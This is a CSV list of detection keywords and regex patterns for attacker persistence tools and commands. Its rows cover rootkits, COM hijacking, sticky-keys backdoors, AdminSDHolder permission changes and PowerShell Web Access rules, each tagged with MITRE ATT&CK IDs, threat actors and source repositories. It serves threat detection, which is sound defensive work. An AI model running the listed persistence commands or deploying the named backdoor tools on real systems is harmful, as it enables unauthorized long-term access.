"*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*",".{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","#filehash","N/A","8","1","57","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z"
"*abpttsclient.py*",".{0,1000}abpttsclient\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*ABPTTSClient-log.txt*",".{0,1000}ABPTTSClient\-log\.txt.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*abpttsfactory.py*",".{0,1000}abpttsfactory\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0*",".{0,1000}acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*action=SchTaskCOMHijack *",".{0,1000}action\=SchTaskCOMHijack\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*add_malicious_pager*",".{0,1000}add_malicious_pager.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*add_malicious_pre_commit*",".{0,1000}add_malicious_pre_commit.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc*",".{0,1000}addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#filehash","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*Add-KeeThiefLurker *",".{0,1000}Add\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*",".{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","10","1","17","3","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z"
"*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*",".{0,1000}Add\-PswaAuthorizationRule\s\-UsernName\s\\.{0,1000}\s\-ComputerName\s\\.{0,1000}\s\-ConfigurationName\s\\.{0,1000}","greyware_tool_keyword","powershell","allows all users to access all computers with a specified configuration","T1053","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*Add-PswaAuthorizationRule*-ComputerName *",".{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-ComputerName\s.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Add-PswaAuthorizationRule*-UserName *",".{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-UserName\s.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Add-PswaAuthorizationRule*-UserName *",".{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-UserName\s.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Persistence","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Add-WindowsFeature Hyper-V -IncludeManagementTools*",".{0,1000}Add\-WindowsFeature\sHyper\-V\s\-IncludeManagementTools.{0,1000}","greyware_tool_keyword","powershell","enabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machine","T1560.003 - T1547 - T1059","TA0003 - TA0002","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079*",".{0,1000}ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#GUIDproject","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52*",".{0,1000}aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*Aegrah/PANIX*",".{0,1000}Aegrah\/PANIX.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d*",".{0,1000}af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd*",".{0,1000}afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*AFB848D0-68F8-42D1-A1C8-99DFBE034FCF*",".{0,1000}AFB848D0\-68F8\-42D1\-A1C8\-99DFBE034FCF.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*All Done! Hack the planet!*",".{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*--assemblyargs AntiVirus AppLocker*",".{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*ATK/Sandman-A*",".{0,1000}ATK\/Sandman\-A.{0,1000}","signature_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#Avsignature","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*ATK/Seatbelt-A*",".{0,1000}ATK\/Seatbelt\-A.{0,1000}","signature_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#Avsignature","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*autodiscover/brute.go*",".{0,1000}autodiscover\/brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4*",".{0,1000}b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b17a74e58d85f8d1ecfa38831fbca197c8edeb92e6c3a856e8c6b1030149ebe7*",".{0,1000}b17a74e58d85f8d1ecfa38831fbca197c8edeb92e6c3a856e8c6b1030149ebe7.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a*",".{0,1000}b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*",".{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","0","#filehash","N/A","N/A","2","112","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z"
"*b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44*",".{0,1000}b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd*",".{0,1000}b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6*",".{0,1000}b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2*",".{0,1000}b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*B362EC25-70BD-4E6C-9744-173D20FDA392*",".{0,1000}B362EC25\-70BD\-4E6C\-9744\-173D20FDA392.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617*",".{0,1000}b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*",".{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e*",".{0,1000}b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489*",".{0,1000}b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b6a919990fe576710a4ce3ed46cc40d91ce4d59e547af8c50b739920987b7e44*",".{0,1000}b6a919990fe576710a4ce3ed46cc40d91ce4d59e547af8c50b739920987b7e44.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f*",".{0,1000}b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e*",".{0,1000}b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf*",".{0,1000}b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096*",".{0,1000}b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*b96e491df170080d656cf7e24dd085bc15e044e72c5bbbd6abbe3bcc230b328d*",".{0,1000}b96e491df170080d656cf7e24dd085bc15e044e72c5bbbd6abbe3bcc230b328d.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
